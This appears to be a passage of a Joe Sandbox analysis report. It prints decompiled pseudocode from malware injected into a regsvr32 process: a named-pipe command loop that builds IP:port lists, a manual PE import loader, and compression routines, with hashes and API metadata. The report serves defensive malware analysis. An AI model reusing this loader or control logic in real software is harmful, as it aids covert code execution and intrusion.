              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: strchr$_snprintf
              • String ID: %.*g
              • API String ID: 3619936089-952554281
              • Opcode ID: b99d6b85e131cc753bc83a47c1f31d40d6aa6adb4d64de80687aff47ca20bd42
              • Instruction ID: 55112ebdcb4d469c30cdde637fc9fec0d25151d1473b455e52bed121a7813dff
              • Opcode Fuzzy Hash: b99d6b85e131cc753bc83a47c1f31d40d6aa6adb4d64de80687aff47ca20bd42
              • Instruction Fuzzy Hash: 0421246264469567EB229E2DEC8AFFF77989F12720F144125F94C8A181E7AC9F4043D1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00733775 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310pipeCOMMON
              Download Yara Rule
              C-Code - Quality: 62%
              			E00733775(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x74f8d0; // 0xc2f8c0
					_push(0);
					_push( *0x74f8b4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x74f8d0; // 0xc2f8c0
					_push(0x80000);
					_push( *0x74f974);
					_push( *0x74f8b4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x74f974; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E007409C3( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E0073D297(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x74f8b4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E007316B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E00738DC9(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E0073D297(_t187);
									L52:
									E00738DDF( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E0073A5D0(_t203));
									_push(_t203);
									_t188 = 5;
									E0073D297(_t188);
									E00738DDF( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E0073A5D0(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E0073A5D0(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E0073A5D0(_t203) + _t203;
										__eflags = _t110;
										E00739FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E007316B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E00738DDF( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E007409C3( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E00739D29( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x74f974; // 0x0
								E0073A06E( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E00731D97(E0073A102( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E00738DC9(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E00731D97(E0073A102( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E00739E22( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E00739A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0073A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E0073D297(_t195);
							 *0x74f9a8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E007409A1( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E007409A1( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































              0x00733775
              0x0073377b
              0x00733788
              0x0073378d
              0x00733791
              0x00733791
              0x00733796
              0x00733797
              0x0073379d
              0x007337a9
              0x00000000
              0x00000000
              0x007337bc
              0x007337c1
              0x007337c2
              0x007337c7
              0x007337cc
              0x007337d2
              0x007337e0
              0x00733aec
              0x00000000
              0x007337f1
              0x007337f1
              0x007337f7
              0x007337fa
              0x007337fd
              0x0073396b
              0x0073396b
              0x0073396e
              0x00733ae2
              0x0073382c
              0x0073382d
              0x00733831
              0x00733831
              0x00733833
              0x00733833
              0x00733834
              0x0073394f
              0x0073394f
              0x00733950
              0x00733955
              0x00733af2
              0x00733af8
              0x00733b03
              0x00733b05
              0x00733b06
              0x00733b08
              0x00733b09
              0x00000000
              0x00000000
              0x00000000
              0x00733b09
              0x00733975
              0x00733975
              0x00733978
              0x007339bd
              0x007339c1
              0x007339c6
              0x007339ca
              0x007339cc
              0x00733acd
              0x00733ad3
              0x00733ad7
              0x00733852
              0x00733852
              0x00000000
              0x00733852
              0x007339d2
              0x007339d6
              0x007339da
              0x007339e3
              0x007339e5
              0x007339ea
              0x007339ec
              0x00733aa7
              0x00733aa7
              0x00733aa7
              0x00733ab0
              0x00733ab2
              0x00733ab5
              0x00733ab6
              0x00733abd
              0x00733ac3
              0x00000000
              0x00733ac3
              0x007339f2
              0x007339f4
              0x007339f6
              0x00733a85
              0x00733a8c
              0x00733a8d
              0x00733a90
              0x00733a91
              0x00733a9d
              0x00733aa2
              0x00000000
              0x00733aa2
              0x00733a00
              0x00733a00
              0x00733a03
              0x00733a07
              0x00733a07
              0x00733a09
              0x00733a0e
              0x00733a10
              0x00733a13
              0x00733a19
              0x00733a1d
              0x00733a1d
              0x00733a10
              0x00733a23
              0x00733a25
              0x00733a29
              0x00733a2b
              0x00733a2e
              0x00733a35
              0x00733a3e
              0x00733a44
              0x00733a49
              0x00733a52
              0x00733a6a
              0x00733a6a
              0x00733a6d
              0x00733a72
              0x00733a76
              0x00733a76
              0x00733a79
              0x00733a7a
              0x00733a7d
              0x00733a81
              0x00733a81
              0x00000000
              0x00733a07
              0x0073397a
              0x0073397d
              0x00000000
              0x00000000
              0x00733987
              0x0073398b
              0x00733990
              0x00733994
              0x00733998
              0x0073399a
              0x007339a2
              0x007339a8
              0x007339ac
              0x007339b0
              0x00000000
              0x007339b0
              0x00733803
              0x00733961
              0x00733845
              0x00733846
              0x00733848
              0x00733850
              0x00733851
              0x00000000
              0x00733851
              0x0073384a
              0x00000000
              0x0073384a
              0x00733809
              0x0073380c
              0x00733884
              0x00733886
              0x0073388c
              0x0073388e
              0x0073392b
              0x0073392b
              0x0073393d
              0x00733943
              0x0073394c
              0x0073394d
              0x00000000
              0x0073394d
              0x00733894
              0x00733898
              0x0073389b
              0x0073391f
              0x00733924
              0x00733927
              0x00000000
              0x00733927
              0x0073389d
              0x007338a0
              0x007338a8
              0x007338ad
              0x007338b2
              0x007338b4
              0x00000000
              0x00000000
              0x007338b8
              0x007338b9
              0x007338bb
              0x007338ea
              0x007338f9
              0x007338fe
              0x00733901
              0x0073390d
              0x00000000
              0x0073390d
              0x007338bd
              0x007338c1
              0x007338cf
              0x007338d4
              0x007338d8
              0x007338d9
              0x007338de
              0x007338e2
              0x007338e2
              0x007338e6
              0x00000000
              0x007338e6
              0x0073380e
              0x00733811
              0x00733859
              0x0073385a
              0x0073385d
              0x0073385e
              0x00733865
              0x0073386b
              0x00000000
              0x0073386b
              0x00733814
              0x00733817
              0x00733840
              0x00000000
              0x00733840
              0x0073381c
              0x00000000
              0x00000000
              0x00733827
              0x00000000
              0x00733827
              0x007337e0
              0x00733b17

              APIs
              • GetLastError.KERNEL32 ref: 007337AB
                • Part of subcall function 0073D297: FlushFileBuffers.KERNEL32(00000000,?,00733ABB,00000000,00000004), ref: 0073D2DD
              • DisconnectNamedPipe.KERNEL32 ref: 00733AF8
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
              • String ID: %u.%u.%u.%u:%u
              • API String ID: 465096328-3858738763
              • Opcode ID: 9f5410a866cfaf336270577ba830f64000211f9d98177bf0e3a0e21c7e8bac0d
              • Instruction ID: 5b7b3e3b8be2116c590ca9ae191e7470d6a24ae17c296175977b28b92a254cb0
              • Opcode Fuzzy Hash: 9f5410a866cfaf336270577ba830f64000211f9d98177bf0e3a0e21c7e8bac0d
              • Instruction Fuzzy Hash: E1A1C272508301EFF324DF64D889A6BB7E8EF84314F14892EF59587182EB7CDA058B56
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0074376C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 50%
              			E0074376C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0073F024(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























              0x0074376c
              0x00743772
              0x0074377a
              0x0074378f
              0x007437a1
              0x007437ad
              0x007437b3
              0x007437b8
              0x007437c4
              0x0074392f
              0x00000000
              0x0074392f
              0x007437ca
              0x007437d3
              0x007437e1
              0x007437e4
              0x007437f3
              0x007437f3
              0x007437fa
              0x00743808
              0x0074380b
              0x0074381b
              0x00743828
              0x0074382f
              0x0074383f
              0x00743851
              0x00743857
              0x00743841
              0x00743849
              0x00743849
              0x0074385a
              0x0074385e
              0x0074386a
              0x0074386e
              0x00743872
              0x00743876
              0x00743882
              0x007438ad
              0x007438b5
              0x007438bb
              0x007438c7
              0x007438d3
              0x00743884
              0x00743889
              0x00743894
              0x007438a0
              0x007438a0
              0x007438dc
              0x007438e2
              0x007438ec
              0x00743908
              0x007438ee
              0x007438f1
              0x007438fd
              0x007438fd
              0x007438ec
              0x00743910
              0x00743919
              0x00743919
              0x00743927
              0x00000000
              0x00743927
              0x00743833
              0x00000000
              0x00743833
              0x00000000
              0x0074380b
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00743789
              • LoadLibraryA.KERNEL32(00000000), ref: 00743822
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: HandleLibraryLoadModule
              • String ID: GetProcAddress$kernel32.dll
              • API String ID: 4133054770-1584408056
              • Opcode ID: 395b7ce2dc5178c3de679385d202ea570d36168c5c7f22c7c888e455f90f1d84
              • Instruction ID: 095df1f3b1668eaa056dd43cd5ede3a9522e0824e1b97904f75cc790fc057508
              • Opcode Fuzzy Hash: 395b7ce2dc5178c3de679385d202ea570d36168c5c7f22c7c888e455f90f1d84
              • Instruction Fuzzy Hash: DA618D75D00209EFDB00CF98C985BADBBF1FF08315F248599E855AB2A1D378AA80DF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073E9AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
              Download Yara Rule
              APIs
              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0073E9E3
              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0073E9F2
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ArrayBoundSafe
              • String ID: ks
              • API String ID: 62119774-4038699377
              • Opcode ID: f1e9deb529376a894b01802262160690e0dd187b2448e26d541ea72c89b5f792
              • Instruction ID: 09d7cc169fd14443511f3cc9ecbe9995f10c90392592209445f14a6af1cb791c
              • Opcode Fuzzy Hash: f1e9deb529376a894b01802262160690e0dd187b2448e26d541ea72c89b5f792
              • Instruction Fuzzy Hash: BD31A372E5121EAFFB20CA94CC46BFEB779BB04700F148456F605A22D3D7B8AA449791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00744160 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
              Download Yara Rule
              C-Code - Quality: 99%
              			E00744160(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5d08408b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x51ec8b55
					_t12 = _t272 + 0x5c; // 0xee85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00747180(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00745EE0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xee85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00746020( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x51ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x51ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8508458b
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x51ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x51ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x830a74c0
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xee85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8508458b
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x51ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00746020(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x51ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5d08408b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xee85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xee85000
							E00747180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00745EE0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
